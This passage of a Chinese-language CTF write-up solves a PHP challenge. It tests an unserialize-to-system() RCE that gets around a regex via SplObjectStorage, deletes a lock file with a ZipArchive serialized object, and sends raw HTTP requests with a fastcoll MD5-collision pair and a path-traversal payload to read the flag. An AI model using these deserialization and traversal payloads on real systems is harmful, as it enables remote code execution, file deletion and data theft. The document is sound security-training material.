这里30个字符
1
./../../../../../../../../flag
但是由于本身不熟悉,wakeup之后destruct之后还是否触发,于是写个demo测试一下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<? php
error_reporting ( 0 );
highlight_file ( __FILE__ );
class ctfshow {
public function __wakeup (){
echo "wakeup \n " ;
}
public function __destruct (){
system ( $this -> ctfshow );
}
}
$data = $_GET [ '1+1>2' ];
if ( ! preg_match ( "/^[Oa]:[\d]+/i" , $data )){
unserialize ( $data );
}
?>
1
2
3
4
5
6
7
<? php
class ctfshow {
public $ctfshow = 'whoami' ;
}
$a = new SplObjectStorage ();
$a -> a = new ctfshow ();
echo serialize ( $a );
成功RCE,那么写个poc删除文件,但是用什么呢,翻看我的原生类笔记发现ZipArchive的open方法可以做到
1
2
3
4
5
6
7
8
9
10
11
12
13
<? php
class Jesen {
public $filename = './sandbox/lock.lock' ;
public $content = 8 ;
public $me ;
}
$a = new Jesen ();
$zip = new ZipArchive ();
$a -> me = $zip ;
$b = serialize ( $a );
echo $b ;
/* 改一下属性个数
O : 5 : "Jesen" : 4 : { s : 8 : "filename" ; s : 19 : "./sandbox/lock.lock" ; s : 7 : "content" ; i : 8 ; s : 2 : "me" ; O : 10 : "ZipArchive" : 5 : { s : 6 : "status" ; i : 0 ; s : 9 : "statusSys" ; i : 0 ; s : 8 : "numFiles" ; i : 0 ; s : 8 : "filename" ; s : 0 : "" ; s : 7 : "comment" ; s : 0 : "" ;}}
然后发包
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST / HTTP / 1.1
Host : 114.67.175.224:16474
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Upgrade-Insecure-Requests : 1
Referer : http://114.67.175.224:16474/
Accept-Encoding : gzip, deflate
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Content-Type : application/x-www-form-urlencoded
Origin : http://114.67.175.224:16474
Pragma : no-cache
Cache-Control : no-cache
Content-Length : 390
a%5B%5D=1&b%5B%5D=2&c=O%3A5%3A%22Jesen%22%3A4%3A%7Bs%3A8%3A%22filename%22%3Bs%3A19%3A%22.%2Fsandbox%2Flock.lock%22%3Bs%3A7%3A%22content%22%3Bi%3A8%3Bs%3A2%3A%22me%22%3BO%3A10%3A%22ZipArchive%22%3A5%3A%7Bs%3A6%3A%22status%22%3Bi%3A0%3Bs%3A9%3A%22statusSys%22%3Bi%3A0%3Bs%3A8%3A%22numFiles%22%3Bi%3A0%3Bs%3A8%3A%22filename%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22comment%22%3Bs%3A0%3A%22%22%3B%7D%7D
再访问文件发现没了,那就可以了
然后使用fastcoll,这里1.txt里面写那30个字符,然后生成文件(不会用的可以看我SHCTF2024那个文章,那是我第一次使用),然后验证看看
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<? php
function readmyfile ( $path ){
$fh = fopen ( $path , "rb" );
$data = fread ( $fh , filesize ( $path ));
fclose ( $fh );
return $data ;
}
$a = urlencode ( readmyfile ( "E:/CTFtools/fastcoll_v1.0.0.5.exe/1_msg1.txt" ));
$b = urlencode ( readmyfile ( "E:/CTFtools/fastcoll_v1.0.0.5.exe/1_msg2.txt" ));
if ( md5 (( string ) urldecode ( $a )) === md5 (( string ) urldecode ( $b ))){
echo $a . " \n " . " \n " ;
}
if ( urldecode ( $a ) != urldecode ( $b )){
echo $b ;
}
完美,那么现在再写poc打就行
1
2
3
4
5
6
7
8
<? php
class Jesen {
public $username ;
public $content ;
public $me ;
}
$a = new Jesen ();
echo serialize ( $a );
发包
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST / HTTP / 1.1
Host : 114.67.175.224:16474
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Upgrade-Insecure-Requests : 1
Referer : http://114.67.175.224:16474/
Accept-Encoding : gzip, deflate
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Content-Type : application/x-www-form-urlencoded
Origin : http://114.67.175.224:16474
Pragma : no-cache
Cache-Control : no-cache
Content-Length : 390
a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03HX%E5r%04%93%D5%8E%B8c%A2I%02%B3%BA%11%9F%BE%3D%10%25%B7%296fB%E5%A5%8D%AD%A2%9A%D5%FD%EBB%ED%E7%26%8B%60%CDt%1A%98%F9i%CC%BC%B4%E7%D3%D4%7D%3DL%C0sux%9B%D89%DB%5C%90%02%0C%0C%DD%A7%8F%1C%B0P7%E4%2B%1E%08%9C%9Dp%FF%85%0E%1E%D3%1A%069%EC%C6%01%E6n%5E%1EV%F4%8F%F8%12%AAGHO%7FPJl%F6%5B8%06%F7%7Cdm%BD%5CC%02%0F%F2%F3I&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03HX%E5r%04%93%D5%8E%B8c%A2I%02%B3%BA%11%9F%BE%BD%10%25%B7%296fB%E5%A5%8D%AD%A2%9A%D5%FD%EBB%ED%E7%26%8B%60%CDt%1A%18%FAi%CC%BC%B4%E7%D3%D4%7D%3DL%C0s%F5x%9B%D89%DB%5C%90%02%0C%0C%DD%A7%8F%1C%B0P7%E4%2B%1E%08%9C%9D%F0%FF%85%0E%1E%D3%1A%069%EC%C6%01%E6n%5E%1EV%F4%8F%F8%12%AAGHO%7F%D0Il%F6%5B8%06%F7%7Cdm%BD%5CC%82%0F%F2%F3I&c=O:5:"Jesen":3:{s:8:"username";N;s:7:"content";N;s:2:"me";N;}